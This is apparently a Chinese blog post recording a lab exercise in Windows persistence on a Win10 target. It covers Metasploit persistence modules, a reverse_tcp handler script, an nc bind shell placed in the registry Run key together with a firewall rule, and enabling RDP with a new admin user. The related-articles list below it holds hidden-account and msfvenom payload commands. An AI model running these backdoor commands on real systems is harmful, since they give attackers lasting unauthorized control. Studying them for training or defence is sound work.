内网学习第十二天--权限维持

最新推荐文章于 2024-11-06 19:12:15 发布
原创 最新推荐文章于 2024-11-06 19:12:15 发布 · 1.1k 阅读 · 17 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#学习

本文详细介绍了通过MSF模块(如persistence_service、persistence_exe和registry_persistence)、nc、远程桌面等手段在Windows系统上实现开机权限维持的方法,以及如何配置和使用这些工具。

前言

        大体上来讲,这几种权限维持的方法都是通过服务或者注册表,使一些木马开机时自动运行,就可以实现权限维持。

        1.使用msf的exploit/windows/local/persistence_service模块

        2.使用msf的post/windows/manage/persistence_exe模块

        3.使用msf的exploit/windows/local/registry_persistence模块

        4.使用nc进行权限维持

        5.使用远程桌面进行权限维持

persistence_service模块

这个模块是通过,安装一个服务,且在tmp目录下安装了一个exe的程序,

来指定去连接的主机

 1.拿下主机的system权限,这里用的是win10的靶机

2.运行模块 ,配置一下session,改一下端口,等等监听这个端口

 运行这个模块,有个程序,确定存在就可以了

 然后再开一个msf监听这个端口,重启win10

5678.rc的内容

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.90.219
set LPORT 5678
exploit -j -z

 

 重新拿到shell

persistence_exe模块

这个模块,就是传个exe的程序上去,写到注册表里面,然后开机自启

1.拿下主机system权限

2.使用post/windows/manage/persistence_exe模块

这个模块的原理是在注册表中自启动一个程序,这个程序需要指定,如下图所示

3.运行后查看程序是否存在

这里,我也不知道出现了啥问题,这个模块死活写不进注册表,

但是流程是这样,原理也是这样的。

下面那个注册表的位置找了一圈没找到,但是程序确实在temp目录下面有

4.根据那个上传的程序,再确定用什么方法监听shell,我这里用的就是msf生成的木马,
原则上重启win10就可以拿到这个shell,但是我没做成功

 registry_persistence模块 

这个和刚刚那个是一样的,区别是这个不用指定程序,

相当于直接使用的是msf生成的木马程序,原理也是写入注册表。

 

使用nc进行权限维持

这个也是把nc放到自启项中,然后nc把shell丢出去,再主动连接这个shell

 nc的命令详解

nc.exe -Ldp 4445 -e cmd.exe

将nc写入注册表,注意需要管理员权限

reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v netcat /t REG_SZ /d "C:\Users\admin\Desktop\nc.exe -Ldp 4445 -e cmd.exe" /f

防火墙放行4445端口

netsh advfirewall firewall add rule name='netcat' dir=in action=allow protocol=Tcp localport=4445

连接nc的两种方式

 

远程桌面的权限维持

这个就是直接开启远程桌面的服务,msf有模块可以快捷开启

post/windows/manage/enable_rdp

这个模块可以创建一个用户,直接加入远程桌面组和管理员组

设置password和username即可

用kali连接远程桌面

 

后话

下一篇讲端口转发了,他讲的那个工具也还行,比较方便,但是我会补充一个别的工具可以做代理转发,但是下一篇啥时候发,就不一定了……

 

落魄谷
关注
内网渗透-windows权限维持的方法
lza20001103的博客
08-26 1527
windows权限维持的方法 文章目录windows权限维持的方法一、影子账户二、粘滞键后门三、logon scripts后门五、注册表自启动后门六、屏幕保护程序后门七、计划任务后门八、服务自启动后门九、黄金票据十、白银票据十二、bitsadmin十五、CLR劫持 一、影子账户 1.使用如下命令创建隐藏用户并加入管理员组 net user test$ 123456 /add net localgroup administrators test$ /add 创建成功后使用net user命令无法查看到此用
内网权限维持 —— 后门
战神/calmness的博客
12-09 1370
目录 操作系统后门 粘滞键 注册表注入 计划任务 meterpreter Cymothoa WMI型 web 后门 Nishang 下的webshell weevely webacoo ASPX meterpreter PHP meterpreter 域控制器权限持久化 DSRM 域后门 SSP 维持域控权限 SID History 域后门 Golden Ticket Silver Ticket Skeleton Key Hook PasswordChangeNot
内网安全-权限维持-黄金白银票据维持&基于登录进程劫持-Skeleton Key&SID history&DSRM&SSP权限维持
weixin_45701675的博客
04-25 993
内网安全之权限维持
12.3、后渗透测试--持久化后门
无痕的博客
12-13 4027
metasploit后渗透测试--持久化后门
突破meterpreter建立永久访问权限访问其他主机——借刀杀人
渗透测试
05-09 2031
文章目录前言一、使用场景二、实施步骤1.渗透b主机2.建立socks代理服务器3.设置浏览器代理4.设置永久访问权限总结 前言 渗透目标主机,对目标主机搭建跳板建立代理服务器,通过代理主机访问其他主机,不留痕迹 一、使用场景 主机a想访问c无法访问,c只让特定的IP地址访问,例如b,此时就可以先渗透b,在上面搭建跳板建立代理服务器,通过代理服务器访问c 本期例子,a主机使用kali,b主机winxp,c主机linux 二、实施步骤 1.渗透b主机 因为目标位winxp,先使用最常用的MS08_06
web端权限维持
wodafa的博客
02-27 1383
前言 关于权限维持,我之前写过一篇基于系统端的后门技术文章,如映像劫持啊,lpk之类。当然啦,在拿到权限后,在web端做手脚也是个好办法。 PS:还是希望论坛早点支持markdown哦,不然排版很是费劲。 内容目录: - 构造文件包含漏洞 - 隐蔽性脚本木马 - 构造sql注入点 正文 0x01 构造文件包含漏洞 >**本部分概览:** > * 基本的文
内网权限维持
wuxinweii的博客
11-10 2938
攻击者在提升权限后,往往会通过建立后门来维持对目标主机的控制权。这样一来,即使修复了被攻击者利用的系统漏洞,攻击者还是可以通过后门继续控制目标系统 一、粘贴键后门 windows 系统下连续按 5 次 shift 可调出其程序,粘滞键是为了那些按钮有困难的人设计的,就是按键困难,那么如果用 ctrl+c,ctrl+v 这种快捷键或者其他需要组合的键时,就会有困难,不具备一次按两个或多个键的能力,那么此时就可以单按 5 下 shift 键来启动粘滞键功能。 所以我们可以通过更改注册表的命令来进行后门维持 在命
第68天-内网安全-域横向 PTH&PTK&PTT 哈希票据传
MCTSOG的博客
05-18 1074
思维导图 知识点 Kerberos 协议 具体工作方法,在域中,简要介绍一下: 客户机将明文密码进行 NTLM 哈希,然后和时间戳一起加密(使用krbtgt 密码 hash 作为密钥),发送给 kdc(域控),kdc 对用户进行检测,成功之后创建 TGT(Ticket-Granting Ticket) 将 TGT 进行加密签名返回给客户机器,只有域用户 krbtgt 才能读 取 kerberos 中 TGT 数据 然后客户机将 TGT 发送给域控制器 KDC 请求 TGS(票证授权服务)票证,并且对
内网渗透-kerberos认证和黄金白银票据
最新发布
m0_64481831的博客
11-06 1405
假设我们已拿到的域内所有账户的hash,包括krbtgt账户,此时你失去了域管理员权限但拥有一个普通域用户权限,碰巧管理员在域内加固时忘记重置krbtgt密码,基于此条件,我们还能利用该票据重新获得域管理员权限,利用krbtgt的hash值可以伪造生成任意的TGT,能够绕过对任意用户的账号策略,让用户成为任意组的成员,可用于kerberos认证的任何服务。4. 如果有权限,则给Client访问Server的权限Ticket,也叫ST,这里的ST是用Server自身的Server NTLM进行加密的。
2024年最新Windows权限维持技术总结、复现_cs权限维持,网络安全开发技术总结
2401_84264692的博客
05-06 1069
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon的作用是指定用户登录时 Winlogon 运行的程序。默认情况下,Winlogon 运行 Userinit.exe(运行登录脚本),重新建立网络连接,然后启动 Windows 用户界面 Explorer.exe。可以更改此条目的值以添加或删除程序。
内网安全--权限维持
weixin_58782362的博客
11-05 900
C:\Windows\System32\mimilsa.log 记录登录的账号密码(前提条件是需要在线切换用户,且服务器不重启)1、mimilib.dll 传到目标域控的c:\windows\system32\目录下。c:\windows\system32\kiwissp.log 记录账号密码文件。方法一:但如果域控制器,被注入的内存的伪造的ssp将会丢失。域环境的权限维持、单机版的权限维持、web权限维持。使用此方法即使系统重启,也不会影响到持久化的效果。权限维持:为攻击者创造出稳定的输出。
windows内网渗透--权限维持
weixin_47099592的博客
07-03 1042
scr 文件实际上是一个可执行文件,类似于 .exe 文件。它们可以包含相同的代码,并且可以执行相同的任务。注释掉#source /etc/network/interfaces.d/*这个见我上一篇文章,这个还有个思路就是劫持后可以写一个添加管理员用户。将Administrator账户所复制的值,粘贴到hack。成功实现最基础的windows run注册表持久化。攻击机 kali 192.168.1.100。复制Administrator 中的F键值。接下来我们实现最简单的windows持久化。
内网渗透系列:权限维持方法小结
闵行小鱼塘
08-02 2888
小结下权限维持方法
内网安全:权限维持的各种姿势
8888的博客
07-12 2810
监听:msfconsole -x "use exploit/multi/handler;MSF后门和监听:msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.11.128 LPORT=9997 -f exe -o update.exe。MSF后门:msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.11.128 LPORT=9999 -f exe -o kms.exe。
MSF之persistence权限维持
大方子
10-18 2618
首先,我们先生成一个 PAYLOAD :  msfpayload(msfvenom) windows/meterpreter/reverse_tcp LHOST=192.168.2.133 LPORT=1218 X >xx.exe 接着,我们来配置一个反弹会话的监听处理: use exploit/multi/handler set payload windows/meterp...
kali linux权限维持,msfconsole权限维持
weixin_42297742的博客
04-29 569
获取管理员hash获得shell后,执行命令getsystem提高权限为管理员权限,接着执行命令run post/windows/gather/hashdump获取hashAdministrator:500:aad3b435b51404eeaad3b435b51404ee:bd75068c6729aacd2fe3497b43bb664e:::权限维持执行命令use exploit/windows/...
MSF后渗透权限维持
轻舟已过万重山
09-25 1184
MSF后渗透阶段,创建后门用户,权限维持,后门维持学习
评论 1
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值